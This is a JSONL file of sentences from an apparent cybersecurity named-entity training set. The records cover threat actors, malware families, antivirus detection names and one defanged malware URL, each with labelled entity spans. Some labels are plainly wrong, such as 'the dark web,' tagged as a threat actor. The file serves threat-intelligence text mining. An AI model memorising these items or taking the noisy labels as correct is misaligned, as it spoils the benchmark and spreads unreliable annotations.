{"text": "As spotted by FireEye on 2015-04-17, Angler EK is now taking advantage of a vulnerability patched with the last version of Flash Player 17.0.0.169", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Angler EK": [[37, 46]], "VULNERABILITY: vulnerability": [[76, 89]], "SYSTEM: Flash Player": [[123, 135]]}, "info": {"id": "cyner2_train_006769", "source": "cyner2_train"}}
{"text": "In the first of our series on the dark web, Cyble uncovered a new strain of InfoStealer malware targeting Cryptocurrency users via phishing sites and YouTube channels, as well as the source code and GitHub repository.", "spans": {"THREAT_ACTOR: the dark web,": [[30, 43]], "ORGANIZATION: Cyble": [[44, 49]], "MALWARE: new strain": [[62, 72]], "MALWARE: InfoStealer malware": [[76, 95]], "ORGANIZATION: Cryptocurrency users": [[106, 126]], "ORGANIZATION: YouTube channels,": [[150, 167]], "SYSTEM: GitHub repository.": [[199, 217]]}, "info": {"id": "cyner2_train_006770", "source": "cyner2_train"}}
{"text": "In April 2017, the Cisco Talos team disclosed the Scarcruft group's proprietary tool, ROKRAT, a malware that has been continuously modified and used by the group to this day.", "spans": {"ORGANIZATION: Cisco Talos team": [[19, 35]], "THREAT_ACTOR: the Scarcruft group's": [[46, 67]], "MALWARE: ROKRAT,": [[86, 93]], "MALWARE: malware": [[96, 103]], "THREAT_ACTOR: the group": [[152, 161]]}, "info": {"id": "cyner2_train_006772", "source": "cyner2_train"}}
{"text": "Its malicious code is located in a Mach-O object file that was repackaged into some versions of Xcode installers.", "spans": {"MALWARE: malicious code": [[4, 18]], "SYSTEM: Xcode installers.": [[96, 113]]}, "info": {"id": "cyner2_train_006774", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.VB!O TROJ_GE.C2A90427 Multi.Threats.InArchive W32/Rewdulon.A TROJ_GE.C2A90427 Win.Trojan.Dentenspy-1 Trojan.Win32.VB.pbucu Trojan.WinSpy.1721 Trojan.VB.Win32.74988 W32/Rewdulon.RWFU-0950 TrojanSpy.VB.eqx TR/Proxy.VB.mm Trojan[Proxy]/Win32.VB Backdoor:Win32/Rewdulon.A Trojan.Heur.VP2.EA6021 Trojan/Win32.Winspy.R17397 TrojanProxy.VB Win32/Spy.VB.NPF Trojan.PR.VB!L9iJM/+WFQY Trojan-Proxy.Win32.VB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006775", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.FakeInst.L Android.FakeNotify.A Android.Trojan.FakeInst.L Android.Trojan.FakeInst.L HEUR:Trojan-SMS.AndroidOS.Opfake.bo A.H.Pay.Emugo.L Trojan.Android.Opfake.dtqjss Android.Malware.Trojan Trojan:Android/FakeNotify.A Trojan[SMS]/Android.Opfake Android.Trojan.FakeInst.L HEUR:Trojan-SMS.AndroidOS.Opfake.bo Android-Trojan/SmsSend.837f Trojan.AndroidOS.FakeInst.D Trojan.AndroidOS.MalCrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006776", "source": "cyner2_train"}}
{"text": "A new spear phishing campaign is targeting Saudi Arabia governmental organizations.", "spans": {"THREAT_ACTOR: spear phishing campaign": [[6, 29]], "ORGANIZATION: governmental organizations.": [[56, 83]]}, "info": {"id": "cyner2_train_006777", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D25EAD Win32.Trojan.WisdomEyes.16070401.9500.9841 Backdoor.Trojan BKDR_SMALL.W Win.Trojan.Coreshell-1 Trojan.Win32.Metlar.hmosd Trojan.Click2.7627 BKDR_SMALL.W BDS/Metlar.A Backdoor:Win32/Metlar.A W32/Small.W!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006778", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Blackmail.Worm Win32.Worm.Killav.GR Worm/W32.Nyxem.65024.B Email-Worm.Win32.Nyxem!O Worm.Nyxem W32/MyWife.d@MM!M24 W32/VB.bi WORM_NYXEM.E Win32.Worm.VB.sy W32/Kapser.A@mm W32.Blackmal.E@mm Win32/Blackmal.F!CME24 WORM_NYXEM.E Win.Worm.Nyxem-7 Email-Worm.Win32.Nyxem.e Win32.Worm.Killav.GR Trojan.Win32.Nyxem.wcrgf W32.W.Nyxem.lNe6 Win32.Worm-email.Nyxem.Syhr Win32.Worm.Killav.GR Worm.Win32.VB.NEI Email-Worm:W32/Nyxem.E BehavesLike.Win32.Worm.kc W32/Kapser.KOCX-1196 I-Worm/VB.g WORM/KillAV.GR Worm[Email]/Win32.Nyxem Worm:Win32/Mywife.E@mm!CME24 Win32.Worm.Killav.GR I-Worm.Win32.Nyxem.E Win32.Worm.Killav.GR Worm/Win32.Nyxem.R67250 Win32.Worm.Killav.GR Email-Worm.VB Win32/VB.NEI Worm.P2P.VB.CIL!CME-24 Win32.Worm.Killav.GR W32/Nyxem.E@mm W32/Tearec.A.worm!CME-24 Trojan.Win32.KillAV.AG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006779", "source": "cyner2_train"}}
{"text": "A backdoor also known as: AIT:Trojan.Nymeria.219 Trojan.Fsysna AIT:Trojan.Nymeria.219 W32/Trojan.KHZX-2886 Trojan.Win32.Fsysna.epqb AIT:Trojan.Nymeria.219 Trojan.Win32.Fsysna.eusaby AIT:Trojan.Nymeria.219 AIT:Trojan.Nymeria.219 Trojan.Fsysna.Win32.15287 Trojan.Win32.Autoit TR/Fsysna.vdzaj AIT:Trojan.Nymeria.219 Trojan.Win32.Fsysna.epqb Trojan:Win32/Enotdap.A Trojan/Win32.Fsysna.C2239375 Trj/CI.A Win32.Trojan.Fsysna.Iiu W32/Autoit.CK!tr.spy Win32/Trojan.623", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006780", "source": "cyner2_train"}}
{"text": "In April, the new Infostealer family of Spanish origin was first noted targeting users in the U.S. and Mexico.", "spans": {"MALWARE: Infostealer family": [[18, 36]], "ORGANIZATION: targeting users": [[71, 86]]}, "info": {"id": "cyner2_train_006781", "source": "cyner2_train"}}
{"text": "The operation uses known and patched exploits to deliver a custom backdoor known as KeyBoy.", "spans": {"THREAT_ACTOR: The operation": [[0, 13]], "VULNERABILITY: patched exploits": [[29, 45]], "MALWARE: KeyBoy.": [[84, 91]]}, "info": {"id": "cyner2_train_006782", "source": "cyner2_train"}}
{"text": "The variant is highly targeted, digitally signed, and exfiltrates stolen payment card data over DNS.", "spans": {"MALWARE: variant": [[4, 11]], "SYSTEM: DNS.": [[96, 100]]}, "info": {"id": "cyner2_train_006784", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Snuff.A Win32.TrojanDropper.Snuff.A.2 Trojan/Dropper.FC.a Trojan.DR.FC!ID4WOR5KQxg Win32/TrojanDropper.FC.A Backdoor.Trojan.dr W32/FC.Y Win32/TrojanRunner.I TROJ_DROPPER.ACU Win32.TRFC.A Trojan-Dropper.Win32.FC.a Trojan.Dropper.Snuff.A Virus.Win32.Trojano.421!IK TrojWare.Win32.TrojanDropper.FC.A Trojan.Dropper.Snuff.A BackDoor.Bifrost.14965 TR/FC.A TROJ_DROPPER.ACU TrojanDropper.Win32.FC TrojanDropper:Win32/Snuff.A Trojan.Win32.FC.21040 Trojan.Dropper.Snuff.A Dropper/FC.4096 Trojan-Dropper.Win32.FC.a Backdoor.Trojan Harm.SysCrash Virus.Win32.Trojano.421 W32/Fc.A!tr Dropper.Tiny.K Trj/MultiDrp.AF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006786", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Zusy.D3A031 Trojan.Kwampirs TROJ_KWAMPIRS.SMJK Trojan.Win32.Bedep.az TROJ_KWAMPIRS.SMJK BehavesLike.Win32.BadFile.dm Trojan.Win32.Kwampirs Trojan.Bedep.u TR/Crypt.ZPACK.sfqtf Trojan.Win32.Bedep.az Trojan/Win32.Bedep.R199961 Trojan.Bedep Trojan.Injector Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006787", "source": "cyner2_train"}}
{"text": "From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems – Windows, OSX, Linux, even mobile iOS.", "spans": {"THREAT_ACTOR: group": [[37, 42]], "MALWARE: tools": [[64, 69]], "VULNERABILITY: zero-day exploits": [[98, 115]], "SYSTEM: applications": [[133, 145]], "SYSTEM: Java": [[154, 158]], "SYSTEM: Microsoft Office,": [[162, 179]], "SYSTEM: operating systems": [[314, 331]], "SYSTEM: Windows, OSX, Linux,": [[334, 354]], "SYSTEM: mobile iOS.": [[360, 371]]}, "info": {"id": "cyner2_train_006789", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.4D03 Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9639 Trojan.Win32.TPM.eslggg BehavesLike.Win32.PWSZbot.cc Trojan.Heur.RP.ZyWaayyb2wki Trojan.Win32.Z.Ircbot.839168.A Win32.Trojan.Crypt.Hqux Trojan.Themida! Trojan-PWS.OnlineGames Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006791", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_PROTUX.SMZKEB-G Trojan.Win32.RedCap.exxfqg Trojan.Win32.Z.Zusy.8916480 Trojan.MulDrop7.62734 Trojan.Banbra.Win32.27829 BKDR_PROTUX.SMZKEB-G W32/Trojan.CPEN-4136 TR/RedCap.xslwz Trojan.Symmi.D1461E Trojan/Win32.Comnie.R209069 Trojan.Drnohell Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006795", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Bublik.274432.B Backdoor.Win32.Caphaw Trojan.Symmi.D1465 Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.ELRU-2307 Trojan.Win32.Caphaw.exkhwo Trojan.Win32.A.Bublik.274432.D BackDoor.Caphaw.2 BehavesLike.Win32.PWSZbot.dh Trojan.Win32.Bublik Trojan/Bublik.ank Backdoor:Win32/Caphaw.D Trojan/Win32.Bublik.R46085 Backdoor.Win32.Caphaw SScope.Backdoor.Caphaw.A Win32/Trojan.144", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006796", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Fifesock W32.W.Otwycal.l4av Net-Worm.Win32.Koobface Spammer:Win32/Fifesock.B Win32/RiskWare.PEMalform.E Win32/Trojan.c9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006800", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RansomGimemoB.Trojan Trojan.Win32.Kazy!O Trojan.Qhost.Win32.6280 Trojan.Kazy.D7BDE9 Win32.Trojan.WisdomEyes.16070401.9500.9903 Win32/Ternanu.C HV_ZYX_BG26035C.TOMC Trojan.Win32.Inject.sbpf Trojan.Win32.DownLoad2.brqxff Packer.W32.Krap.ldx7 Trojan.DownLoad2.39110 BehavesLike.Win32.Virus.dh Trojan-Ransom.Win32.Gimemo Trojan/Qhost.cty W32.Gimemo Trojan[Backdoor]/Win32.Delf Trojan/Win32.FakeAV.R10033 Trojan-Dropper.11705 Ransom.FileCryptor W32/Injector.HVQ!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006802", "source": "cyner2_train"}}
{"text": "We are not including the IP addresses from the C2 infrastructure since it is compromised infrastructure that is not longer in use", "spans": {"SYSTEM: C2 infrastructure": [[47, 64]], "VULNERABILITY: compromised": [[77, 88]]}, "info": {"id": "cyner2_train_006804", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.S488527 Trojan.Smallprox Trojan.Win32.Zusy.elolmi Trojan.Proxy2.577 TR/Proxy.mzyhy Trojan.Symmi.D11AD5 Win32/Trojan.1ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006806", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.HackTool.18432.M Win32.Trojan.WisdomEyes.16070401.9500.9952 Hacktool.Notahproxy HackTool:Win32/Onaht.A Riskware.HackTool!NeLzDaI7P40 Malware_fam.NB Win32/Trojan.Hacktool.4e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006808", "source": "cyner2_train"}}
{"text": "Examples included fake commercial suppliers or shipping companies sending an updated price list, banks asking customers to validate banking information, or confirmation of equipment delivery.", "spans": {}, "info": {"id": "cyner2_train_006809", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Adware.FC.529 Trojan.Razy.D2449C Win32.Trojan.WisdomEyes.16070401.9500.9898 Riskware.Win32.Dotdo.ewnrxt Adware.Dotdo.25 Trojan.MSIL.Trojanproxy TR/Proxy.ulkkx Trojan:MSIL/Faikdal.A PUP.DotDo/Variant Adware.DotDo.DotPrx Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006811", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OpaservA.Worm Net-Worm.Win32.Opasoft!O W32.OpaServ.A W32/Opaserv.worm.a WORM_OPASERV.A Win32.Worm.Opaserv.e W32/Opaserv.worm.A W32.Opaserv.Worm Win32/Opaserv.A WORM_OPASERV.A Win.Worm.OpaSoft-3 Net-Worm.Win32.Opasoft.a Trojan.Win32.Opasoft.wglh Worm.Win32.Opaserv Win32.Worm-net.Opasoft.Eeqs Win32.Opasoft Trojan.OpaKill.Win32.1 W32/Opaserv.worm.a Worm.Win32.Opasoft.A W32/Opaserv.worm.A Worm/Opasoft.a Worm[Net]/Win32.Opasoft Worm.Opasoft Net-Worm.Win32.Opasoft.a Worm:Win32/Opaserv.A Win32/Opasoft.worm.28672 Worm.Opaserv.AT W32/Opaserv.fam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006812", "source": "cyner2_train"}}
{"text": "The threat actors are reusing tools, techniques, and procedures which overlap throughout these operations with little variance.", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "MALWARE: tools,": [[30, 36]]}, "info": {"id": "cyner2_train_006815", "source": "cyner2_train"}}
{"text": "This attack highlights how macro malware in Microsoft Office files is fast becoming a big threat to businesses and organizations.", "spans": {"MALWARE: macro malware": [[27, 40]], "SYSTEM: Microsoft Office": [[44, 60]], "VULNERABILITY: big threat": [[86, 96]], "ORGANIZATION: businesses": [[100, 110]], "ORGANIZATION: organizations.": [[115, 129]]}, "info": {"id": "cyner2_train_006816", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE Trojan[Exploit]/Win32.CCProxyOver Exploit:Win32/Prix.A.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006819", "source": "cyner2_train"}}
{"text": "As reported, the source of the attack appears to have been the website of the Polish financial regulator.", "spans": {"ORGANIZATION: the Polish financial regulator.": [[74, 105]]}, "info": {"id": "cyner2_train_006820", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan:MSIL/Bogoclak.A Trojan.MSIL.Lynx.3 Trj/GdSda.A Backdoor.MSIL MSIL/Stealors.NET!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006821", "source": "cyner2_train"}}
{"text": "Signing the malware with a stolen and subsequently publicly leaked code-signing certificate is sloppy even for well-known CN-APT groups.", "spans": {"MALWARE: malware": [[12, 19]], "THREAT_ACTOR: CN-APT groups.": [[122, 136]]}, "info": {"id": "cyner2_train_006822", "source": "cyner2_train"}}
{"text": "Through correlation of technical indicators and command and control infrastructure, FireEye assess that APT28 is probably responsible for this activity.", "spans": {"SYSTEM: command": [[48, 55]], "ORGANIZATION: FireEye": [[84, 91]], "THREAT_ACTOR: APT28": [[104, 109]]}, "info": {"id": "cyner2_train_006823", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Chiko.Worm Trojan/W32.StartPage.377856 Trojan.Win32.StartPage!O Worm.AutoRun W32.W.Fearso.kYUv WORM_SILLY.ICA Win32.Worm.Delf.cg W32.SillyFDC Win32/Chike.A Worm.Win32.AutoRun.ihn Trojan.Win32.StartPage.yqro Trojan.Win32.StartPage.377856 Trojan.StartPage.52501 Trojan.StartPage.Win32.1 Virus.Win32.Alman Trojan/StartPage.de TR/Delf.AKP Trojan/Win32.StartPage Win32.Virut.ce.57344 Trojan.Heur.ED91C9 Worm.Win32.AutoRun.ihn Worm:Win32/Chiki.A HEUR/Fakon.mwf TScope.Trojan.Delf W32/Chike.C.worm Win32/Delf.NFT Win32.Worm.Autorun.Pavh Trojan.StartPage!orHv1sw9Olo W32/StartPage.AJH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006825", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.W32.Nethief.l7ro TrojWare.Win32.Packed.PNC BehavesLike.Win32.Backdoor.kc Trojan.Krypt.19 Trojan-Dropper.Delf Trj/CI.A Win32/Trojan.8cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006826", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Inject.ASP Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Win32.Kryptik.evmmfw Trojan.Win32.Z.Inject.49664 Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Crypt3 W32/Trojan.HLQX-0378 Backdoor:Win32/Deselia.B!dha Trojan/Win32.Kryptik.R153606 W32/ESILE.C!tr Script/Trojan.b13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006827", "source": "cyner2_train"}}
{"text": "Longhorn, which we internally refer to as The Lamberts first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability CVE-2014-4148.", "spans": {"THREAT_ACTOR: Longhorn,": [[0, 9]], "THREAT_ACTOR: The Lamberts": [[42, 54]], "ORGANIZATION: ITSec community": [[90, 105]], "ORGANIZATION: FireEye": [[140, 147]], "VULNERABILITY: a zero day vulnerability": [[175, 199]]}, "info": {"id": "cyner2_train_006828", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D2E557 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006829", "source": "cyner2_train"}}
{"text": "It is hardly surprising that there is an element of overlap, considering both actors have for years mined victims in the South China Sea area, apparently in search of geo-political intelligence.", "spans": {}, "info": {"id": "cyner2_train_006831", "source": "cyner2_train"}}
{"text": "BEBLOH always came up with new defensive measures to avoid AV products, and this time is no different.", "spans": {"MALWARE: BEBLOH": [[0, 6]], "SYSTEM: AV products,": [[59, 71]]}, "info": {"id": "cyner2_train_006832", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Banload.reo Win32.Trojan.WisdomEyes.16070401.9500.9590 Win.Trojan.Graftor-2494 Trojan.Win32.Graftor.cuifrv Trojan.Banker.Win32.94901 TR/Graftor.6930.12 Trojan.Graftor.D17FC TrojanDownloader:Win32/Bangkgrob.A Trj/CI.A TrojanSpy.Banker!0zttYTGMFlo Trojan-Downloader.Win32.Banload W32/Banker.ZZN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006835", "source": "cyner2_train"}}
{"text": "That number is likely inflated, mainly because of dynamic IP allocation and historic records not being removed promptly.", "spans": {"VULNERABILITY: historic records not being removed promptly.": [[76, 120]]}, "info": {"id": "cyner2_train_006836", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Malruze Trojan.Win32.Z.Malruze.113664 Trojan:Win32/Malruze.A!gfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006837", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Birele!O Win32.Trojan.WisdomEyes.16070401.9500.9907 W32/Miner.UKCL-7487 W32/Miner.B Trojan.Win32.CoinMiner.pmp Trojan/Win32.Miner.C2255099", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006838", "source": "cyner2_train"}}
{"text": "Recently, the Threat Monitoring System of QiAnXin Threat Intelligence Center monitored that a botnet written in GO language was spreading through multiple vulnerabilities.", "spans": {"SYSTEM: the Threat Monitoring System": [[10, 38]], "ORGANIZATION: QiAnXin Threat Intelligence Center": [[42, 76]], "MALWARE: botnet": [[94, 100]], "SYSTEM: GO language": [[112, 123]], "VULNERABILITY: multiple vulnerabilities.": [[146, 171]]}, "info": {"id": "cyner2_train_006839", "source": "cyner2_train"}}
{"text": "The site is redirecting users to rgdotfoldersasapdotcom which is a RIG EK landing page that serves a malicious flash file and a malicious binary.", "spans": {"MALWARE: RIG EK": [[67, 73]], "MALWARE: malicious flash file": [[101, 121]], "MALWARE: malicious binary.": [[128, 145]]}, "info": {"id": "cyner2_train_006841", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WintaskLTH.Trojan Worm.Psyokym.A3 W32.SillyFDC WORM_PSYOKYM.SM23 Trojan-Dropper.Win32.Sysn.bqcc Trojan.Win32.WBNA.ctgbxm Trojan.DownLoader5.33626 WORM_PSYOKYM.SM23 Worm.Win32.Psyokym WORM/Psyokym.A.34 Worm:Win32/Psyokym.A Trojan.Zusy.D393D Trojan.Win32.Downloader.189952.AV Trojan-Dropper.Win32.Sysn.bqcc HEUR/Fakon.mwf Worm.AutoRun!angV1RJQRlk W32/Virut.CE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006842", "source": "cyner2_train"}}
{"text": "For over half a decade, the Naikon APT waged multiple attack campaigns on sensitive targets throughout South-eastern Asia and around the South China Sea.", "spans": {"THREAT_ACTOR: Naikon APT": [[28, 38]], "THREAT_ACTOR: attack campaigns": [[54, 70]]}, "info": {"id": "cyner2_train_006843", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D14EB5 Win32/Oflwr.A!crypt Win.Downloader.Boltolog-223 Win32.Application.PUPStudio.A Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R BackDoor.BlackHole.20244 TR/Graftor.123479.4 Trojan:Win32/Semsubim.A Trojan.Wecod Win32/Trojan.Clicker.4d5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006846", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.CED3 Trojan.Zenshirsh.SL7 Trojan.Zusy.D13E0F Win32.Trojan.Kryptik.av Trojan.Win32.Emager.ngb Trojan.Win32.FKM.dsobxk Trojan.Win32.Z.Zusy.159744.AME Backdoor.W32.Hupigon.le6i TrojWare.Win32.BHO.NJYY Trojan.Packed.26400 BehavesLike.Win32.Backdoor.cc Trojan.Win32.Spy Trojan.Emager.ly W32.Infostealer.Zeus Win32.Troj.Undef.kcloud Trojan.Win32.Emager.ngb Trojan/Win32.Small.C10819 TScope.Malware-Cryptor.SB Trojan.Win32.Dropper.abe Trojan.Emager!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006847", "source": "cyner2_train"}}
{"text": "Unit 42 researchers at Palo Alto Networks have discovered new attack activity targeting individuals involved with United States defense contractors.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "ORGANIZATION: Palo Alto Networks": [[23, 41]], "ORGANIZATION: United States defense contractors.": [[114, 148]]}, "info": {"id": "cyner2_train_006850", "source": "cyner2_train"}}
{"text": "However, it should be noted that this was not an isolated incident: this is the latest in a series of similar attacks in Ukraine.", "spans": {}, "info": {"id": "cyner2_train_006851", "source": "cyner2_train"}}
{"text": "At the time, it was being distributed via both targeted email campaigns and exploit kits EKs.", "spans": {"THREAT_ACTOR: email campaigns": [[56, 71]], "MALWARE: exploit kits EKs.": [[76, 93]]}, "info": {"id": "cyner2_train_006852", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.RAR W32/Trojan.WAHH-7616 Trojan.Win32.RAR.crvcdy Trojan.Win32.Z.Dropper.1318323 Trojan:MSIL/Ainslot.A Win32/PSW.Tibia.NGP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006855", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BypassUAC Exploit.Win32.BypassUAC.ihb Trojan.Win32.Tordev.exuhxz Exploit.W32.Bypassuac!c BackDoor.Tordev.976 Exploit.BypassUAC.Win32.1119 BehavesLike.Win32.Dropper.bc Trojan.Win32.Ekstak Exploit.BypassUAC.amp TR/Injector.otvkc Trojan[Exploit]/Win32.BypassUAC Trojan.Graftor.D71C73 Exploit.Win32.BypassUAC.ihb Backdoor:Win32/Rescoms.B Trojan/Win32.BypassUAC.C2399731 Exploit.BypassUAC Trj/CI.A Win32.Trojan.Inject.Auto Win32/Trojan.852", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006856", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.VB.z4 Trojan.VB.Win32.155172 Trojan/Dropper.StartPage.dzs Win32.Trojan.WisdomEyes.16070401.9500.9663 Trojan.Win32.VBKrypt TrojanDownloader:Win32/Swity.C Trojan.VB!g1fz4qjxDzc W32/VB.NTK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006858", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.SmokeLdr.A3 Trojan.Ransom.GlobeImposter Trojan.Injector TROJ_INJECT.AUSPTF Win32.Trojan.Injector.MH Trojan.Win32.Khalesi.bjm Trojan.Win32.Khalesi.exdymq Trojan.Win32.Z.Razy.286720.EN Trojan.Encoder.11539 TROJ_INJECT.AUSPTF BehavesLike.Win32.PWSZbot.dm Trojan-Ransom.GlobeImposter W32/Trojan.BXWF-8222 Trojan.Khalesi.jz TR/Kryptik.nopxu Trojan/Win32.Khalesi Trojan.Razy.D3C133 Trojan.Win32.Khalesi.bjm Trojan/Win32.VBKrypt.C2374802 Trojan.Khalesi Trj/GdSda.A Win32.Trojan.Khalesi.Swkj Win32/Trojan.674", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006859", "source": "cyner2_train"}}
{"text": "It is an old threat and was well-described by Symantec back in 2009.", "spans": {"MALWARE: old threat": [[9, 19]], "ORGANIZATION: Symantec": [[46, 54]]}, "info": {"id": "cyner2_train_006861", "source": "cyner2_train"}}
{"text": "A nubmer of downloaders installing further malware from http://mondaynightfundarts[.]com/images/Nu48djdi.zip", "spans": {"MALWARE: downloaders": [[12, 23]], "MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_006864", "source": "cyner2_train"}}
{"text": "It's a trojan spy which is installed as service called RCSU.", "spans": {"MALWARE: trojan spy": [[7, 17]]}, "info": {"id": "cyner2_train_006865", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodeac.Trojan.9edf Trojan.PlugX.A4 BKDR_PLUGX.DUKH Win32.Trojan.WisdomEyes.16070401.9500.9975 BKDR_PLUGX.DUKH Trojan-Spy.Win32.Lurk.vtx Trojan.Win32.Datufly.ebtzfj Trojan.Win32.Z.Injector.9728.AR[h] Uds.Dangerousobject.Multi!c Trojan.Injector.Win32.378784 worm.win32.gamarue.z TrojanSpy.Lurk.ep TR/Datufly.hmoo W32/Injector.CXAC!tr Trojan.Graftor.D429AC Trojan:Win32/Datufly.B!dha Trojan/Win32.Datufly.R184100 TrojanSpy.Lurk Win32.Trojan-spy.Lurk.Amck TrojanSpy.Lurk!fV54mUiVDuY Trojan.Win32.Injector Inject3.AMFK Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006866", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Irc.Mimic.C Trojan.Glitch.A BKDR_IRCMIMIC.C IRC/Mimic.C Hacktool.Flooder BKDR_IRCMIMIC.C Win.Trojan.Soldier-7 Backdoor.IRC.Mimic.c Backdoor.Irc.Mimic.C DoS.W32.LifeWare!c Backdoor.Irc.Mimic.C DDoS.LifeWire BehavesLike.Win32.PWSZbot.bc Trojan.Win32.DoS IRC/Mimic.C IRC/Mimic.8 HackTool[DoS]/Win32.LifeWare DDoS:Win32/LifeWire.A Backdoor.IRC.Mimic.c DoS.LifeWare Trojan.HideWindows Bck/Iroffer.BG Irc.Backdoor.Mimic.Htmt VBS.Flood.L W32/LifeWare.A!dos Win32/Virus.IRC.f2c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006867", "source": "cyner2_train"}}
{"text": "Using the Dynamic Threat Intelligence Cloud DTI, FireEye researchers detected a pattern of attacks beginning on April 13th, 2015.", "spans": {"SYSTEM: Dynamic Threat Intelligence Cloud DTI,": [[10, 48]], "ORGANIZATION: FireEye": [[49, 56]]}, "info": {"id": "cyner2_train_006868", "source": "cyner2_train"}}
